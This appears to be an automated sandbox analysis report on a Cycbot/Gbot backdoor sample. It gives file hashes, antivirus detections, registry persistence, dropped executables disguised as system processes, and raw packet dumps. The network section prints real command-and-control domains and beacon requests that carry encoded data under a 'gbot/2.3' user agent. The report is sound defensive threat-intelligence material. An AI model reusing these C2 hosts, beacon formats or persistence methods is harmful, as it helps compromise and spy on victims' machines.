Analysis Date2015-01-17 02:08:05
MD5f5ce71be9e70019a03bad3f2328a6338
SHA1a45418aa741ed7f2b58d3de9f68d0eb0e3acbfee

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: c0ea9326f1be81a02ea14e9dceb18c68 sha1: b93b7480a7ce766c10c86144cb862ba824122dc0 size: 117760
Section.rdata md5: d36aca9b86c6d953ab422b8731de29fb sha1: 22df014b7fc5797a6c8e1b0b7e5a92e4374ab114 size: 1024
Section.data md5: bfb966d7f513f16ca1ff26d7e642ba9c sha1: a6d8922f8d05b2e8829b53438a33cd69ff5acb50 size: 25088
Section.rsrc md5: 350b5595b05aa28d22be3a3c24d02884 sha1: ed9420b6e11e9b6d101266aa1298d31a5ecb0243 size: 1024
Timestamp2005-09-17 03:48:23
VersionPrivateBuild: 1102
PEhashe4339c0f08183c28d5e369e2d3971a7618631976
IMPhashd296dd80736c7fdf0dadecd8baf5f02b
AV360 Safeno_virus
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Trojan.Heur.KS.1
AVAuthentiumW32/Goolbot.C.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVBullGuardGen:Trojan.Heur.KS.1
AVCA (E-Trust Ino)Win32/FakeSpypro.B!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Diple-19
AVDr. WebTrojan.Siggen2.11227
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.IVA
AVFortinetW32/FakeAV.PACK!tr
AVFrisk (f-prot)W32/Goolbot.C.gen!Eldorado
AVF-SecureTrojan-Downloader:W32/Renos.GTC
AVGrisoft (avg)Agent.5.BJ
AVIkarusPacked.Win32.Krap
AVK7Backdoor ( 003210941 )
AVKasperskyBackdoor.Win32.Gbot.bs
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.e
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVRisingno_virus
AVSophosTroj/FakeAV-CDG
AVSymantecBackdoor.Cycbot!gen2
AVTrend MicroBKDR_CYCBOT.SME
AVVirusBlokAda (vba32)Backdoor.Gbot

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Mutex{C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutex{C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSzoneck.com
Winsock DNSwww.google.com
Winsock DNSmotherboardstest.com
Winsock DNShistorykillerpro.com
Winsock DNS127.0.0.1
Winsock DNSzonejm.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNShistorykillerpro.com
Type: A
192.185.245.93
DNSmotherboardstest.com
Type: A
204.11.56.45
DNSwww.google.com
Type: A
64.233.185.105
DNSwww.google.com
Type: A
64.233.185.104
DNSwww.google.com
Type: A
64.233.185.103
DNSwww.google.com
Type: A
64.233.185.99
DNSwww.google.com
Type: A
64.233.185.147
DNSwww.google.com
Type: A
64.233.185.106
DNSzoneck.com
Type: A
208.79.234.132
DNSzonejm.com
Type: A
23.239.15.54
DNSxibudific.cn
Type: A
HTTP GEThttp://historykillerpro.com/img/eslogo.gif?tq=gJ4WK%2FSUh6zGkER8oY%2BQrMWTUj26kJHjyZZTK%2B%2FbxWq1SfkIYVhX
User-Agent: gbot/2.3
HTTP GEThttp://motherboardstest.com/images/im133.jpg?tq=gJ4WK%2FSUh7zEhRMw9YLRsrCSUz2uw8a3nNQLabnVsMLElls0rNa1x7KTVjnaoLe2wecnKK7Ql6TH51AortCC5IaGUUmp19LyyZJqtUn5CGFIRQ%3D%3D
User-Agent: gbot/2.3
HTTP GEThttp://www.google.com/
User-Agent:
HTTP GEThttp://www.google.com/
User-Agent:
HTTP GEThttp://zoneck.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUz2uw8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GEThttp://motherboardstest.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUz2uw8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GEThttp://zonejm.com/images/im135.jpg?tq=gL4SK%2FSUh7zEpRMw9JGd5dGwJk6s0824xLMjS9rWwLWyxSE6qaKxpMa1C2m51bCwxbNQK%2B%2FbxUqRSfkIYUhF
User-Agent: gbot/2.3
HTTP GEThttp://motherboardstest.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvUq1ujbwvgS917V65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
HTTP GEThttp://zonejm.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvUq1ujbwvgS917W65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
Flows TCP192.168.1.1:1032 ➝ 192.185.245.93:80
Flows TCP192.168.1.1:1033 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1034 ➝ 64.233.185.105:80
Flows TCP192.168.1.1:1035 ➝ 64.233.185.105:80
Flows TCP192.168.1.1:1036 ➝ 208.79.234.132:80
Flows TCP192.168.1.1:1037 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1038 ➝ 23.239.15.54:80
Flows TCP192.168.1.1:1039 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1040 ➝ 23.239.15.54:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d67 2f65736c 6f676f2e   GET /img/eslogo.
0x00000010 (00016)   6769663f 74713d67 4a34574b 25324653   gif?tq=gJ4WK%2FS
0x00000020 (00032)   5568367a 476b4552 386f5925 32425172   Uh6zGkER8oY%2BQr
0x00000030 (00048)   4d575455 6a32366b 4a486a79 5a5a544b   MWTUj26kJHjyZZTK
0x00000040 (00064)   25324225 32466278 57713153 666b4959   %2B%2FbxWq1SfkIY
0x00000050 (00080)   56685820 48545450 2f312e30 0d0a436f   VhX HTTP/1.0..Co
0x00000060 (00096)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000070 (00112)   0a486f73 743a2068 6973746f 72796b69   .Host: historyki
0x00000080 (00128)   6c6c6572 70726f2e 636f6d0d 0a416363   llerpro.com..Acc
0x00000090 (00144)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000000a0 (00160)   67656e74 3a206762 6f742f32 2e330d0a   gent: gbot/2.3..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674a34 574b2532   3.jpg?tq=gJ4WK%2
0x00000020 (00032)   46535568 377a4568 524d7739 594c5273   FSUh7zEhRMw9YLRs
0x00000030 (00048)   72435355 7a327577 3861336e 4e514c61   rCSUz2uw8a3nNQLa
0x00000040 (00064)   626e5673 4d4c456c 6c733072 4e613178   bnVsMLElls0rNa1x
0x00000050 (00080)   374b5456 6a6e616f 4c653277 65636e4b   7KTVjnaoLe2wecnK
0x00000060 (00096)   4b37516c 36544835 31416f72 74434335   K7Ql6TH51AortCC5
0x00000070 (00112)   49614755 556d7031 394c7979 5a4a7174   IaGUUmp19LyyZJqt
0x00000080 (00128)   556e3543 47464952 51253344 25334420   Un5CGFIRQ%3D%3D 
0x00000090 (00144)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x000000a0 (00160)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x000000b0 (00176)   743a206d 6f746865 72626f61 72647374   t: motherboardst
0x000000c0 (00192)   6573742e 636f6d0d 0a416363 6570743a   est.com..Accept:
0x000000d0 (00208)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x000000e0 (00224)   3a206762 6f742f32 2e330d0a 0d0a       : gbot/2.3....

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 6c733072 4e613178    */*....ls0rNa1x
0x00000050 (00080)   374b5456 6a6e616f 4c653277 65636e4b   7KTVjnaoLe2wecnK
0x00000060 (00096)   4b37516c 36544835 31416f72 74434335   K7Ql6TH51AortCC5
0x00000070 (00112)   49614755 556d7031 394c7979 5a4a7174   IaGUUmp19LyyZJqt
0x00000080 (00128)   556e3543 47464952 51253344 25334420   Un5CGFIRQ%3D%3D 
0x00000090 (00144)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x000000a0 (00160)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x000000b0 (00176)   743a206d 6f746865 72626f61 72647374   t: motherboardst
0x000000c0 (00192)   6573742e 636f6d0d 0a416363 6570743a   est.com..Accept:
0x000000d0 (00208)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x000000e0 (00224)   3a206762 6f742f32 2e330d0a 0d0a       : gbot/2.3....

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 6c733072 4e613178    */*....ls0rNa1x
0x00000050 (00080)   374b5456 6a6e616f 4c653277 65636e4b   7KTVjnaoLe2wecnK
0x00000060 (00096)   4b37516c 36544835 31416f72 74434335   K7Ql6TH51AortCC5
0x00000070 (00112)   49614755 556d7031 394c7979 5a4a7174   IaGUUmp19LyyZJqt
0x00000080 (00128)   556e3543 47464952 51253344 25334420   Un5CGFIRQ%3D%3D 
0x00000090 (00144)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x000000a0 (00160)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x000000b0 (00176)   743a206d 6f746865 72626f61 72647374   t: motherboardst
0x000000c0 (00192)   6573742e 636f6d0d 0a416363 6570743a   est.com..Accept:
0x000000d0 (00208)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x000000e0 (00224)   3a206762 6f742f32 2e330d0a 0d0a       : gbot/2.3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   342e6a70 673f7471 3d674b34 514b2532   4.jpg?tq=gK4QK%2
0x00000020 (00032)   46535568 377a4574 524d7739 594c5273   FSUh7zEtRMw9YLRs
0x00000030 (00048)   72436955 7a327577 3861336e 4f514c61   rCiUz2uw8a3nOQLa
0x00000040 (00064)   626e5673 4d4c4570 6c733072 4e613178   bnVsMLEpls0rNa1x
0x00000050 (00080)   374b6a56 6a6e616f 4c653277 64636e4b   7KjVjnaoLe2wdcnK
0x00000060 (00096)   4b375168 25324657 52343063 25324232   K7Qh%2FWR40c%2B2
0x00000070 (00112)   4e665338 736d6957 6f4e4a25 32425168   NfS8smiWoNJ%2BQh
0x00000080 (00128)   68534555 25334420 48545450 2f312e30   hSEU%3D HTTP/1.0
0x00000090 (00144)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000a0 (00160)   6f73650d 0a486f73 743a207a 6f6e6563   ose..Host: zonec
0x000000b0 (00176)   6b2e636f 6d0d0a41 63636570 743a202a   k.com..Accept: *
0x000000c0 (00192)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000000d0 (00208)   67626f74 2f322e33 0d0a0d0a 67656e74   gbot/2.3....gent
0x000000e0 (00224)   3a206762 6f742f32 2e330d0a 0d0a       : gbot/2.3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   342e6a70 673f7471 3d674b34 514b2532   4.jpg?tq=gK4QK%2
0x00000020 (00032)   46535568 377a4574 524d7739 594c5273   FSUh7zEtRMw9YLRs
0x00000030 (00048)   72436955 7a327577 3861336e 4f514c61   rCiUz2uw8a3nOQLa
0x00000040 (00064)   626e5673 4d4c4570 6c733072 4e613178   bnVsMLEpls0rNa1x
0x00000050 (00080)   374b6a56 6a6e616f 4c653277 64636e4b   7KjVjnaoLe2wdcnK
0x00000060 (00096)   4b375168 25324657 52343063 25324232   K7Qh%2FWR40c%2B2
0x00000070 (00112)   4e665338 736d6957 6f4e4a25 32425168   NfS8smiWoNJ%2BQh
0x00000080 (00128)   68534555 25334420 48545450 2f312e30   hSEU%3D HTTP/1.0
0x00000090 (00144)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000a0 (00160)   6f73650d 0a486f73 743a206d 6f746865   ose..Host: mothe
0x000000b0 (00176)   72626f61 72647374 6573742e 636f6d0d   rboardstest.com.
0x000000c0 (00192)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x000000d0 (00208)   65722d41 67656e74 3a206762 6f742f32   er-Agent: gbot/2
0x000000e0 (00224)   2e330d0a 0d0a2f32 2e330d0a 0d0a       .3..../2.3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   352e6a70 673f7471 3d674c34 534b2532   5.jpg?tq=gL4SK%2
0x00000020 (00032)   46535568 377a4570 524d7739 4a476435   FSUh7zEpRMw9JGd5
0x00000030 (00048)   6447774a 6b367330 38323478 4c4d6a53   dGwJk6s0824xLMjS
0x00000040 (00064)   39725777 4c577978 53453671 614b7870   9rWwLWyxSE6qaKxp
0x00000050 (00080)   4d613143 326d3531 62437778 624e514b   Ma1C2m51bCwxbNQK
0x00000060 (00096)   25324225 32466278 55715253 666b4959   %2B%2FbxUqRSfkIY
0x00000070 (00112)   55684620 48545450 2f312e30 0d0a436f   UhF HTTP/1.0..Co
0x00000080 (00128)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000090 (00144)   0a486f73 743a207a 6f6e656a 6d2e636f   .Host: zonejm.co
0x000000a0 (00160)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x000000b0 (00176)   55736572 2d416765 6e743a20 67626f74   User-Agent: gbot
0x000000c0 (00192)   2f322e33 0d0a0d0a 202a2f2a 0d0a5573   /2.3.... */*..Us
0x000000d0 (00208)   65722d41 67656e74 3a206762 6f742f32   er-Agent: gbot/2
0x000000e0 (00224)   2e330d0a 0d0a2f32 2e330d0a 0d0a       .3..../2.3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427655 7131756a 62777667 53393137   fBvUq1ujbwvgS917
0x00000040 (00064)   56363572 4a716c4c 66675069 57573163   V65rJqlLfgPiWW1c
0x00000050 (00080)   67204854 54502f31 2e300d0a 436f6e6e   g HTTP/1.0..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 206d6f74 68657262 6f617264   ost: motherboard
0x00000080 (00128)   73746573 742e636f 6d0d0a41 63636570   stest.com..Accep
0x00000090 (00144)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x000000a0 (00160)   6e743a20 67626f74 2f322e33 0d0a0d0a   nt: gbot/2.3....
0x000000b0 (00176)   55736572 2d416765 6e743a20 67626f74   User-Agent: gbot
0x000000c0 (00192)   2f322e33 0d0a0d0a 202a2f2a 0d0a5573   /2.3.... */*..Us
0x000000d0 (00208)   65722d41 67656e74 3a206762 6f742f32   er-Agent: gbot/2
0x000000e0 (00224)   2e330d0a 0d0a2f32 2e330d0a 0d0a       .3..../2.3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427655 7131756a 62777667 53393137   fBvUq1ujbwvgS917
0x00000040 (00064)   57363572 4a716c4c 66675069 57573163   W65rJqlLfgPiWW1c
0x00000050 (00080)   67204854 54502f31 2e300d0a 436f6e6e   g HTTP/1.0..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 207a6f6e 656a6d2e 636f6d0d   ost: zonejm.com.
0x00000080 (00128)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000090 (00144)   65722d41 67656e74 3a206762 6f742f32   er-Agent: gbot/2
0x000000a0 (00160)   2e330d0a 0d0a6f74 2f322e33 0d0a0d0a   .3....ot/2.3....
0x000000b0 (00176)   55736572 2d416765 6e743a20 67626f74   User-Agent: gbot
0x000000c0 (00192)   2f322e33 0d0a0d0a 202a2f2a 0d0a5573   /2.3.... */*..Us
0x000000d0 (00208)   65722d41 67656e74 3a206762 6f742f32   er-Agent: gbot/2
0x000000e0 (00224)   2e330d0a 0d0a2f32 2e330d0a 0d0a       .3..../2.3....


Strings
<..
I.
040904b0
1102
B&reak
C&ompile
&Data
MS Sans Serif
PrivateBuild
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
085ja6
1> m8g
1PE-ROZa,S
2~NiT^
4JDX&X
*4$X?4
\54ly%X8
=5eX6o0
5JV{{I
6FX\fX[#
6[LGX;
6lm;T*A
7(dX'X$X
7~f=|f
88c'X3
9?<bl9w0UM
9FXnGX
9^T^h$
!AdA#s
cc'GXFX\
cczd"c
CloseHandle
CreateEventA
CreateSemaphoreA
CreateStdAccessibleObject
CreateThread
c}X\j"
@.data
DeleteCriticalSection
dX)_EX
DXEXNz
DXGX	l
:DXK,@
-}DXL.
dXn;zi
DX~_}oQ
.{DX,V;
)dX%X%X+
DX=$X%X
E_l94h
EnterCriticalSection
EnumResourceNamesA
EuO51,.
eX9_%XZ,
EXeXO;
ExitProcess
*eXT9,
EXVi('X)
EX}~VO
E@ZFtI
%FF}qkB
FindClose
FindFirstFileW
FJ9d#5[
FreeEnvironmentStringsA
/*FX4<gX]m
]FXEX\0
=FX?gX
FX	T<a
FXx,nGXi
GetDriveTypeW
GetLastError
GetLocalTime
GetStartupInfoA
GetSystemTimeAsFileTime
GetThreadPriority
gX9eX^z
GXDX-a
gX/DXb
<gXDXS
GXeXnXtR
	gX?fX
gX.hj@
gXuKgXkz
G&X(}W
GX$XTXa
,-]gXz(eX
Gz2,	T
h^hGP@
hhlFre
\hhLibr
}hZt'X
I\dX$X
Ii*V*y
InitializeCriticalSection
iTfX{h
Ivx1)\
JGXGX6
^jhhct
j@hQZ@
jiGXVGX
jjlGX)z~
jW	{;Z
j%X+GX
K4u&X)U
KERNEL32.dll
#kq	)^
k:%XDX)3
,?l:$ 
-L#2Hv
-LcTJ\#{_
LeaveCriticalSection
LeX'X]
?lGX)YB
LoadLibraryA
LogXzA
LresultFromObject
L%{SDk
,#LV9z
lWGXM'X
:	lX*(qs
LYRK=_;
M5(dXo
MN#o	+
M&X$X^9
|!+N=[
Ncodo'
NDXFXt
NEXeX 
N"H]]]
(`<nhst
+o36!_en`
OLEACC.dll
oL}#s,
^om|w$X
oVDXDX7
`.rdata
ReadFile
ReleaseSemaphore
SetEndOfFile
SetEvent
SetFilePointer
s<lh38E5
SXFpkzo
SxQt~w>
teX;%X
tfXZ$X
!This program cannot be run in DOS mode.
Tm7vDX
=tN:Hx
#T/uKm
\T$XiL|
T$X\&X
UfX$Xh
UUGX'XIO~
V9MDX!
VfXdXT
VgXZnt=
vJ'Ggt
[~vlHV
Vo%XGX8
V$Xzoc
WaitForMultipleObjects
WaitForSingleObject
wGXfXo
>W_=;GXM
WlMRn(us
wLmUFXq
W|n&Xn8
WriteFile
W$X}X*
>$X^-	
,/%X>[
[	&X	{
X}]<}	
X+48,k 
X4UGX9C
X6%X[c
X\\7gX
X7:iUQ
X9J9<o
X.,DX+
XdX^5zA
/&XdX6T
XDX^DX_
X^dXeX
XdXL9Q
XDXLEX
XdXlTI
XDX&XR
X\dXZ1
XEX7_"
XeX<DX
XEX/dX&X
XEXeXB
XEX'XmH
	%X~FX"
X\]FXa
XFXkdX
xFXn$X
XfXXfX
XFX&X+mFX
XFXY_weX
%XgX(@
%X;gXc
X[GXGX
&XGXHL%X<"
XgXJ%X
.<'XGXP
X?gX\u}*.
$XGXZ8
X)GXzKFX
xh,?Jq
$XIdXH<
X,iDXi
XIlDXeXU!
X*)?JC
XjEXDX
XJEX$X
X|KeX@
XKFX)ugX
XkgX^}DX
X	leX_
XlFX~FX
XLJ&Xc
XllGXL
XLtDXu
XLu&XV
XlV|H\
XMfXHgX
XMgXlO
X(,m}>+v
XM'XTFX`
{'Xn) 
Xn|EXQ
X-NFX)
X<NuJ~	>
Xn$XM7k
XO<:DX{
X;otK.l
XOT%X?
%Xo%XJM
X\\:?r
'XT$XX
Xu_M&X`
Xu$X'X
XV|>(0
X,^{vlY	'X/U$X
,&X%X 
&X%X7x 
X;(%XC
X'XdX+ 
X'X,fX
XXgX{#
X'X=\n
%X$XnfX
XXnhn2
X>$X]~q
\xx >V
XX^VNj:Y2
X[%X%X
X'X&XN1
x~&X%XX
Xy7tGX
XYGXl=;}(
XzK&XQ
Xz$XFX7
^\Y`3)
y:9DXKz^
y9'&Q[
ydX9mI8
y:EXM|C
yEXN]q
YGXFX>
YXDX\y
$YY.k0Wm
.ZdX_C
zGX.&X
Z'XgXR
z&X+hmdX